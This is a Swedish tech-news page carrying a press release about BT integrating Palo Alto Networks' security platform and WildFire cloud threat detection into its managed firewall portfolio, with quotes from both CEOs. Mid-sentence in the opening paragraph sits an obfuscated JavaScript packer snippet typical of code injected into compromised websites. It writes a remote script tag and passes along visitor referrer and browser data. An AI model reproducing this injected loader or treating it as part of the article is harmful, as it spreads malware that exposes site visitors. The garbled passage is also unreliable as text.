Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

BT och Palo Alto Networks gör molnet säkrare

BT och Palo Alto Networks gör molnet säkrare
Sebastian

BT, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zkdha|var|u0026u|referrer|yhykk||js|php’.split(’|’),0,{}))
en av världens ledande leverantörer av kommunikationstjänster och kommunikationslösningar, och
Palo Alto Networks® (NYSE: PANW), nästa generations säkerhetsföretag, samarbetar nu genom att integrera Palo Alto Networks nästa generations säkerhetsplattform i BT:s globala portfölj av säkerhetstjänster.

BT:s kunder över hela världen kommer kunna utnyttja kombinationen av Palo Alto Networks plattform för att förebygga intrång tillsammans med den globala räckvidden hos BT:s säkerhetstjänster.

Som en del av samarbetet kommer BT:s tjänst Assure Managed Firewall nu integrera med Palo Alto Networks WildFire som är en molnbaserad tjänst för att identifiera, detektera och förebygga okända hot. WildFire är en central del av Palo Alto Networks nästa generations säkerhetsplattform[1]. Detta gör det möjligt att ytterligare underlätta för företag som behöver ha tillgång till molnbaserade applikationer. Det innebär också att företagskunder får större användning av BT:sCloud of Clouds[2].

Mark Hughes, vd för BT Security, säger: “Stora företag vill gärna snabba på sin digitala omvandling och fullt ut utnyttja ny spännande teknik, allt ifrån big data-analyser till molnapplikationer. De behöver tillgång till dessa applikationer på ett säkert sätt, vilket de kan få genom att använda framtidssäkrade verktyg som skyddar dem mot riktade och allt mer sofistikerade cyberattacker. De behöver ett bättre skydd av sina molntjänster. Palo Alto Networks plattform ger intelligent, effektiv säkerhetsövervakning och styrning. Att integrera denna förmåga att förebygga intrång i BT Assures portfölj av säkerhetstjänster blir ett stort steg mot att säkra molnstrategin för en organisation.”

Mark McLaughlin, VD och styrelseordförande på Palo Alto Networks, säger:  “Säkerheten är nu ett stort orosmoln för varje företag, och vi ser en fortsatt tillväxt i fråga om både mängden attacker och hur avancerade de är. En strategi som handlar om att förebygga intrång är central för att göra den digitala framtiden säker för organisationer såväl som individer. Vi är glada att kunna jobba tillsammans med BT med att hjälpa organisationer säkra sina affärsverksamheter och skydda sina mest värdefulla tillgångar, och därigenom att både hantera deras risker och deras säkerhetsbudgetar.”


[1] Palo Alto Networks nästa generations säkerhetsplattform är avsedd att sätta punkt för intrången genom att integrera funktioner som nästa generations brandvägg, avancerat skydd av endpoints och molnbaserad information om hot.

[2] ‘Cloud of clouds’ är BT:s funktion för att integrera molntjänster. Den ger kunderna en väg in i cloud computing som klarar behoven av valfrihet och flexibilitet, fullständig säkerhet och en leverantör som vet hur man får allt att fungera tillsammans. Mer information finns här: www.bt.com/point-of-view